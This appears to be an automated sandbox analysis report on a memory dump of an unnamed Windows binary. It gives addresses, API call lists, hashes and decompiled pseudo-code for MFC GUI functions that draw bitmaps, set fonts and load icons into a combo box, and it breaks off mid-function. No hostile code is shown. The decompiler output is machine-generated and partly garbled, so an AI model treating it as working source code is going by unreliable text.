0x0040b40d
0x0040b40e
0x0040b416
0x0040b41e
0x0040b41e
0x0040b1ed
0x0040b1ed
0x0040b1f3
0x0040b1f6
0x0040b1f7
0x0040b1fc
0x0040b202
0x0040b206
0x0040b209
0x0040b20c
0x0040b20d
0x0040b215
0x0040b218
0x0040b219
0x0040b21e
0x0040b221
0x0040b225
0x0040b22d
0x0040b235
0x0040b239
0x0040b244
0x0040b245
0x0040b249
0x0040b251
0x0040b259
0x0040b25c
0x0040b266
0x0040b267
0x0040b26a
0x0040b272
0x0040b276
0x0040b276
0x0040b423
0x0040b42a
0x0040b434
0x0040b43d

APIs

#535.MFC42(?,?), ref: 0040B1F7
#535.MFC42(?,?,?,?,?), ref: 0040B20D
#3811.MFC42(?,?,?,?,?,?), ref: 0040B219
#858.MFC42(?,00000000,?,?,?,?,?,?,?), ref: 0040B249
#860.MFC42(0044215C,?,00000000,?,?,?,?,?,?,?), ref: 0040B25C
#535.MFC42(?,?), ref: 0040B2BF
#535.MFC42(?,?,?,?,?), ref: 0040B2D5
#3811.MFC42(?,?,?,?,?,?), ref: 0040B2E1

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #535$#3811$#858#860
String ID:
API String ID: 2644984707-0
Opcode ID: 386dcec1645c797d319e49602baefa6045b1ae6e5eca5b8dd0f9e2e13de23884
Instruction ID: 4e75bc70a9c4b8ea5c14bd42fe7dac493ac7b498bd225c9a765d3c6790ac883d
Opcode Fuzzy Hash: 386dcec1645c797d319e49602baefa6045b1ae6e5eca5b8dd0f9e2e13de23884
Instruction Fuzzy Hash: 6E218070E00358EBCF05EFE5D986AEEBBB9AF09314F50015EE005B3282C7386A04CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00401609, Relevance: 7.6, APIs: 5, Instructions: 64
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401609(intOrPtr __ecx) {
				intOrPtr _t28;
				int _t30;
				int _t41;
				intOrPtr _t42;
				struct HDC__* _t44;
				int _t46;
				intOrPtr _t48;
				void* _t50;

				_t28 = E004297FF;
				L004269E6();
				_push(__ecx);
				_push(__ecx);
				_t48 = __ecx;
				 *((intOrPtr*)(_t50 - 0x14)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x42e614;
				 *(_t50 - 4) = 1;
				if( *((intOrPtr*)(__ecx + 0x30)) == 0) {
					 *((intOrPtr*)(__ecx + 8)) = 0;
					 *(__ecx + 4) = 0;
				} else {
					_t46 =  *(__ecx + 0x24);
					_t42 =  *((intOrPtr*)(__ecx + 0x1c));
					_t41 =  *((intOrPtr*)(__ecx + 0x28)) -  *((intOrPtr*)(__ecx + 0x20));
					_t30 =  *((intOrPtr*)(__ecx + 0x2c)) - _t46;
					if(__ecx != 0) {
						 *(_t50 - 0x10) =  *(__ecx + 4);
					} else {
						 *(_t50 - 0x10) =  *(_t50 - 0x10) & 0;
					}
					BitBlt( *(_t42 + 4),  *(_t48 + 0x20), _t46, _t41, _t30,  *(_t50 - 0x10),  *(_t48 + 0x20), _t46, 0xcc0020);
					_t28 =  *((intOrPtr*)(_t48 + 0x18));
					if(_t28 != 0) {
						_t28 =  *((intOrPtr*)(_t28 + 4));
					}
					_push(_t28);
					_push( *((intOrPtr*)(_t48 + 4)));
					L00426540();
				}
				_t44 = _t48 + 0x10;
				 *(_t50 - 0x10) = _t44;
				_t44->i = 0x42c514;
				 *(_t50 - 4) = 2;
				L00425FA6();
				 *(_t50 - 4) =  *(_t50 - 4) | 0xffffffff;
				_t44->i = 0x42c4fc;
				L0042649E();
				 *[fs:0x0] =  *((intOrPtr*)(_t50 - 0xc));
				return _t28;
			}

0x0041b065
0x0041b06a
0x0041b06f
0x0041b070
0x0041b073
0x0041b076
0x0041b079
0x0041b081
0x0041b08b
0x0041b0dd
0x0041b0e0
0x0041b08d
0x0041b08d
0x0041b096
0x0041b099
0x0041b09c
0x0041b0a0
0x0041b0aa
0x0041b0a2
0x0041b0a2
0x0041b0a2
0x0041b0c2
0x0041b0c8
0x0041b0cd
0x0041b0cf
0x0041b0cf
0x0041b0d2
0x0041b0d3
0x0041b0d6
0x0041b0d6
0x0041b0e3
0x0041b0e6
0x0041b0e9
0x0041b0f1
0x0041b0f5
0x0041b0fa
0x0041b100
0x0041b106
0x0041b111
0x0041b119

APIs

_EH_prolog.MSVCRT ref: 0041B06A
BitBlt.GDI32(00000001,?,?,?,?,?,?,?,00CC0020), ref: 0041B0C2
#5785.MFC42(00000001,?), ref: 0041B0D6
#2414.MFC42 ref: 0041B0F5
#640.MFC42 ref: 0041B106

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2414#5785#640H_prolog
String ID:
API String ID: 2015940582-0
Opcode ID: f8e96425f1e9b54dfa379753d6609e134242fa4e79ddbebd2c42e32b6343376c
Instruction ID: 7e67f5f6252292a7448f85fda230500000af06dac7329cceb3d80f762977415a
Opcode Fuzzy Hash: f8e96425f1e9b54dfa379753d6609e134242fa4e79ddbebd2c42e32b6343376c
Instruction Fuzzy Hash: 69216F71A00715DFC720DF59D98596BFBF5FF48304B108A2FE4A693650C7B5A940CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004016F4, Relevance: 7.6, APIs: 5, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E004016F4(void* __ecx, void* __eflags) {
				void* _t23;
				void* _t32;
				void* _t43;
				void* _t45;
				void* _t47;
				intOrPtr _t48;

				L004269E6();
				_t48 = _t47 - 0x14;
				_t43 = __ecx;
				L00401190( *((intOrPtr*)(__ecx + 0x214)), _t45 - 0x10);
				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
				_t32 = _t43;
				_t23 = L00401A00(_t32);
				if(_t23 != 0) {
					_push(_t32);
					 *((intOrPtr*)(_t45 - 0x14)) = _t48;
					_push(0x8065);
					L00425FB8();
					_push(0xb);
					_push(_t48);
					 *((intOrPtr*)(_t45 - 0x18)) = _t48;
					_push(_t45 - 0x10);
					 *(_t45 - 4) = 1;
					L0042611A();
					 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
					_push(_t45 - 0x1c);
					L00425FE8();
					_push(_t48);
					 *((intOrPtr*)(_t45 - 0x20)) = _t48;
					L00401749(_t48, _t45 - 0x1c);
					L00401A96(_t43);
					L00401BA9(_t43 + 0x4b4, 0);
					E004013D4( *((intOrPtr*)(_t43 + 0x370)), 1);
					_t23 = L004018D9(_t43 + 0x218);
				}
				 *(_t45 - 4) =  *(_t45 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return _t23;
			}

0x0040cf3f
0x0040cf44
0x0040cf48
0x0040cf54
0x0040cf59
0x0040cf5d
0x0040cf5f
0x0040cf66
0x0040cf68
0x0040cf6b
0x0040cf6e
0x0040cf73
0x0040cf78
0x0040cf7a
0x0040cf80
0x0040cf83
0x0040cf84
0x0040cf88
0x0040cf8d
0x0040cf94
0x0040cf95
0x0040cf9a
0x0040cf9d
0x0040cfa1
0x0040cfa8
0x0040cfb5
0x0040cfc2
0x0040cfcd
0x0040cfcd
0x0040cfd2
0x0040cfd9
0x0040cfe2
0x0040cfea

APIs

_EH_prolog.MSVCRT ref: 0040CF3F
#537.MFC42(00008065,?,?), ref: 0040CF73
#535.MFC42(?,?,0000000B,00008065,?,?), ref: 0040CF88
#3811.MFC42(?,?,?,0000000B,00008065,?,?), ref: 0040CF95

Part of subcall function 004013D4: _EH_prolog.MSVCRT ref: 0040E57D
Part of subcall function 004013D4: #6199.MFC42(0044217C), ref: 0040E5AD
Part of subcall function 004013D4: #2642.MFC42(00000000,0044217C), ref: 0040E5BF
Part of subcall function 004013D4: #2642.MFC42(00000000,00000000,0044217C), ref: 0040E5C7
Part of subcall function 004013D4: #537.MFC42(00008077,00000000,00000000,0044217C), ref: 0040E5D4
Part of subcall function 004013D4: #6199.MFC42(?,00008077,00000000,00000000,0044217C), ref: 0040E5E2
Part of subcall function 004013D4: #800.MFC42(?,00008077,00000000,00000000,0044217C), ref: 0040E5EE

#800.MFC42(?), ref: 0040CFD9

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2642#537#6199#800H_prolog$#3811#535
String ID:
API String ID: 1939394606-0
Opcode ID: 603ddffc48f3ba601fd7512a02d6feef20df163958194910af0a9a88a8f1b47f
Instruction ID: 77afd08c10104332181ac93a9068ae01babd8871b8d9953a08c4797a0c1fa349
Opcode Fuzzy Hash: 603ddffc48f3ba601fd7512a02d6feef20df163958194910af0a9a88a8f1b47f
Instruction Fuzzy Hash: 5911B270A10215ABCB05FBA6D912BEEB768AF04308F40052FF012B31D2CF785A0487AA

Uniqueness

Uniqueness Score: -1.00%

Function 0040D223, Relevance: 7.6, APIs: 5, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E0040D223(void* __ecx, void* __eflags) {
				void* _t28;
				intOrPtr _t31;
				void* _t33;
				void* _t34;
				void* _t40;
				void* _t45;
				void* _t47;
				intOrPtr _t48;

				L004269E6();
				_t48 = _t47 - 0xc;
				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
				_push(__ecx);
				 *((intOrPtr*)(_t45 - 0x10)) = _t48;
				_push(_t45 + 8);
				L0042611A();
				_t31 =  *((intOrPtr*)(__ecx + 0x214));
				E00401460(_t31, __eflags);
				_push(_t31);
				 *((intOrPtr*)(_t45 - 0x10)) = _t48;
				_push(_t45 + 8);
				L0042611A();
				_t40 = __ecx + 0x4b4;
				 *(_t45 - 4) = 1;
				_t33 = _t40;
				_push(L00401BD6(_t33));
				_push(_t33);
				 *((intOrPtr*)(_t45 - 0x14)) = _t48;
				_push(_t48);
				_t34 = _t40;
				L00401C71(_t34);
				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
				_push(_t45 - 0x18);
				L00425FE8();
				_push(_t34);
				 *((intOrPtr*)(_t45 - 0x14)) = _t48;
				L00401749(_t48, _t45 - 0x18);
				_t28 = L00401A96(__ecx);
				 *(_t45 - 4) =  *(_t45 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return _t28;
			}

0x0040d228
0x0040d22d
0x0040d234
0x0040d238
0x0040d23e
0x0040d241
0x0040d242
0x0040d247
0x0040d24d
0x0040d252
0x0040d258
0x0040d25b
0x0040d25c
0x0040d261
0x0040d267
0x0040d26b
0x0040d272
0x0040d273
0x0040d276
0x0040d279
0x0040d27a
0x0040d27c
0x0040d281
0x0040d288
0x0040d289
0x0040d28e
0x0040d291
0x0040d295
0x0040d29c
0x0040d2a1
0x0040d2a8
0x0040d2b1
0x0040d2ba

APIs

_EH_prolog.MSVCRT ref: 0040D228
#535.MFC42(?), ref: 0040D242

Part of subcall function 00401460: _EH_prolog.MSVCRT ref: 0040B53A
Part of subcall function 00401460: #858.MFC42(?), ref: 0040B568
Part of subcall function 00401460: #858.MFC42(?,?), ref: 0040B57A
Part of subcall function 00401460: #800.MFC42(?,?,?), ref: 0040B5A4

#535.MFC42(?), ref: 0040D25C
#3811.MFC42(?,?,?,00000000,?), ref: 0040D289
#800.MFC42(00000000,?,?,?,?,00000000,?), ref: 0040D2A8

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #535#800#858H_prolog$#3811
String ID:
API String ID: 78905526-0
Opcode ID: 82b060337569d726d1fc18a94b1b1da36a573d7cbc7fbca1667d0c0d6852bc2e
Instruction ID: 02b64d9ea387957a8ccff59379b9772f3359005cb61ef303d6d4f32ba13c057f
Opcode Fuzzy Hash: 82b060337569d726d1fc18a94b1b1da36a573d7cbc7fbca1667d0c0d6852bc2e
Instruction Fuzzy Hash: 7F1186B1B10214A7CB04EB66D907AEEBBBDDF44358F00451FF401A32D2CB786A0486AA

Uniqueness

Uniqueness Score: -1.00%

Function 0041E12C, Relevance: 7.6, APIs: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0041E12C(void* __ecx, intOrPtr _a4) {
				struct tagLOGFONTA _v124;
				void _v344;
				struct HFONT__* _t21;
				void* _t24;
				signed int _t26;
				unsigned int _t28;
				signed int _t29;
				void* _t43;

				_t24 = __ecx;
				_t26 = __ecx + 0x80;
				L00425FA6();
				_v344 = 0x154;
				SystemParametersInfoA(0x29, 0,  &_v344, 0);
				_v124.lfHeight = _v124.lfHeight + _v124.lfHeight;
				asm("repne scasb");
				_t28 =  !(_t26 | 0xffffffff);
				_t43 = _a4 - _t28;
				_t29 = _t28 >> 2;
				memcpy(_t43 + _t29 + _t29, _t43, memcpy( &(_v124.lfFaceName), _t43, _t29 << 2) & 0x00000003);
				_t21 = CreateFontIndirectA( &_v124);
				_push(_t21);
				L004264BC();
				InvalidateRect( *(_t24 + 0x20), 0, 1);
				return _t21;
			}

0x0041e136
0x0041e13a
0x0041e140
0x0041e152
0x0041e15c
0x0041e16d
0x0041e172
0x0041e174
0x0041e17d
0x0041e181
0x0041e18f
0x0041e191
0x0041e197
0x0041e19e
0x0041e1ac
0x0041e1b8

APIs

#2414.MFC42 ref: 0041E140
SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 0041E15C
CreateFontIndirectA.GDI32(?), ref: 0041E191
#1641.MFC42(00000000), ref: 0041E19E
InvalidateRect.USER32(?,00000000,00000001,00000000), ref: 0041E1AC

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1641#2414CreateFontIndirectInfoInvalidateParametersRectSystem
String ID:
API String ID: 1393245127-0
Opcode ID: d3953e66dfac900f1f2f1e4a8482211dab77d309fc6a38903f3dcffd69d6be4f
Instruction ID: 58d24782341713f471b2633919d2767a4d77bae180e962a42cc60537d40b47f9
Opcode Fuzzy Hash: d3953e66dfac900f1f2f1e4a8482211dab77d309fc6a38903f3dcffd69d6be4f
Instruction Fuzzy Hash: A601B9767005049BDB24ABB4EC45BDE7BA5BB84315F10013AFE06DB3C5DA7059488A54

Uniqueness

Uniqueness Score: -1.00%

Function 0041D68A, Relevance: 7.5, APIs: 5, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0041D68A(void* __eax, void* __ecx, signed int _a4) {
				int _v8;
				signed int _t12;
				long _t13;
				signed int _t15;
				signed int _t17;
				void* _t24;

				_push(__ecx);
				_t24 = __ecx;
				L00425E44();
				_t12 = LoadImageA( *(__eax + 0xc), _a4 & 0x0000ffff, 1, 0x10, 0x10, 0);
				_t17 = _t12;
				if(_t17 != 0) {
					_t13 = SendMessageA( *(_t24 + 0x20), 0x143, 0, 0x442220);
					_push(8);
					_v8 = _t13;
					L00425E38();
					 *_t13 = _t17;
					 *(_t13 + 4) = _a4;
					SendMessageA( *(_t24 + 0x20), 0x151, _v8, _t13);
					_t15 = _v8;
				} else {
					_t15 = _t12 | 0xffffffff;
				}
				return _t15;
			}

0x0041d68d
0x0041d690
0x0041d692
0x0041d6a8
0x0041d6ae
0x0041d6b2
0x0041d6cf
0x0041d6d1
0x0041d6d3
0x0041d6d6
0x0041d6dc
0x0041d6e5
0x0041d6f0
0x0041d6f2
0x0041d6b4
0x0041d6b4
0x0041d6b4
0x0041d6f9

APIs

#1168.MFC42 ref: 0041D692
LoadImageA.USER32 ref: 0041D6A8
SendMessageA.USER32 ref: 0041D6CF
#823.MFC42(00000008), ref: 0041D6D6
SendMessageA.USER32 ref: 0041D6F0

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$#1168#823ImageLoad
String ID:
API String ID: 3475336438-0
Opcode ID: b6bf2ff193f9eff26bc47777c8c3219b5a75dffcec035734e8ba7ec4bff6a66c
Instruction ID: 9522b2d34eeebd10e6a05da00499d623b9b9850fe43b623370b70e0cd46d1411
Opcode Fuzzy Hash: b6bf2ff193f9eff26bc47777c8c3219b5a75dffcec035734e8ba7ec4bff6a66c
Instruction Fuzzy Hash: 2F01DB71750304BBD7149B55DC46F997B68FF08720F104027B204AB2D0DAF5ED009758

Uniqueness

Uniqueness Score: -1.00%

Function 0041D6FC, Relevance: 7.5, APIs: 5, Instructions: 45
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0041D6FC(void* __eax, void* __ecx, int _a4, signed int _a8) {
				signed int _t13;
				long _t14;
				signed int _t18;
				void* _t23;

				_t23 = __ecx;
				L00425E44();
				_t13 = LoadImageA( *(__eax + 0xc), _a8 & 0x0000ffff, 1, 0x10, 0x10, 0);
				_t18 = _t13;
				if(_t18 != 0) {
					_t14 = SendMessageA( *(_t23 + 0x20), 0x14a, _a4, 0x442224);
					_push(8);
					_a4 = _t14;
					L00425E38();
					 *_t14 = _t18;
					 *(_t14 + 4) = _a8;
					SendMessageA( *(_t23 + 0x20), 0x151, _a4, _t14);
					return _a4;
				}
				return _t13 | 0xffffffff;
			}

0x0041d701
0x0041d703
0x0041d719
0x0041d71f
0x0041d723
0x0041d741
0x0041d743
0x0041d745
0x0041d748
0x0041d74e
0x0041d757
0x0041d762
0x00000000
0x0041d767
0x00000000

APIs

#1168.MFC42 ref: 0041D703
LoadImageA.USER32 ref: 0041D719
SendMessageA.USER32 ref: 0041D741
#823.MFC42(00000008), ref: 0041D748
SendMessageA.USER32 ref: 0041D762

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$#1168#823ImageLoad
String ID:
API String ID: 3475336438-0
Opcode ID: 046f84c4fc6e99b48a8497cff05184037bee4f8c9cbecaef6a49725e84434e99
Instruction ID: 8868670468919c97fd5282768374553a9ccaa9aab706dc3086545a8e6b806f0b
Opcode Fuzzy Hash: 046f84c4fc6e99b48a8497cff05184037bee4f8c9cbecaef6a49725e84434e99
Instruction Fuzzy Hash: 4E018F76750308BBEB005F65EC46F957B68FB08770F008026BA085B2E0DAF5D8508B54

Uniqueness

Uniqueness Score: -1.00%

Function 00401776, Relevance: 7.5, APIs: 5, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00401776(intOrPtr __ecx) {
				intOrPtr* _t28;
				intOrPtr* _t29;
				void* _t34;

				L004269E6();
				_push(__ecx);
				_push(__ecx);
				 *((intOrPtr*)(_t34 - 0x10)) = __ecx;
				 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
				_t28 = __ecx + 0x18;
				 *((intOrPtr*)(_t34 - 0x14)) = _t28;
				 *_t28 = 0x42c514;
				 *(_t34 - 4) = 3;
				L00425FA6();
				 *_t28 = 0x42c4fc;
				_t29 = __ecx + 0x10;
				 *((intOrPtr*)(_t34 - 0x14)) = _t29;
				 *_t29 = 0x42c514;
				 *(_t34 - 4) = 4;
				L00425FA6();
				 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
				 *_t29 = 0x42c4fc;
				L00425DFC();
				 *(_t34 - 4) =  *(_t34 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t34 - 0xc));
				return E00427FE9;
			}

0x004095f0
0x004095f5
0x004095f6
0x004095fc
0x004095ff
0x00409603
0x00409606
0x00409609
0x00409611
0x00409615
0x0040961f
0x00409621
0x00409624
0x00409627
0x0040962f
0x00409633
0x00409638
0x0040963f
0x00409641
0x00409646
0x0040964d
0x00409658
0x00409660

APIs

_EH_prolog.MSVCRT ref: 004095F0
#2414.MFC42 ref: 00409615
#2414.MFC42 ref: 00409633
#800.MFC42 ref: 00409641
#800.MFC42 ref: 0040964D

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2414#800$H_prolog
String ID:
API String ID: 3907124237-0
Opcode ID: 152ab7fb3268ee573d22a734ced83172126d08d7c026de524b6dd7d3ba55a1be
Instruction ID: 3c0b81c694badcc60cb3818034c54aba7c4bda75703ae41a33f11ba6665e0a84
Opcode Fuzzy Hash: 152ab7fb3268ee573d22a734ced83172126d08d7c026de524b6dd7d3ba55a1be
Instruction Fuzzy Hash: BA01BCB1A00762DFC714DF9AD1456ADFBB8EF50318F60855FD042A3292D7F8AA04CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00401055, Relevance: 7.5, APIs: 5, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00401055(void* __ecx, void* __eflags) {
				void* _t19;
				void* _t30;
				intOrPtr _t32;

				L004269E6();
				_push(__ecx);
				_push(__ecx);
				_push(__ecx);
				 *((intOrPtr*)(_t30 - 0x10)) = _t32;
				_push(_t30 + 0xc);
				 *(_t30 - 4) = 1;
				L0042611A();
				_push(_t32);
				 *((intOrPtr*)(_t30 - 0x14)) = _t32;
				_push(_t30 + 8);
				 *(_t30 - 4) = 2;
				L0042611A();
				 *(_t30 - 4) = 1;
				_t19 = L00401825( *((intOrPtr*)(__ecx + 0x214)));
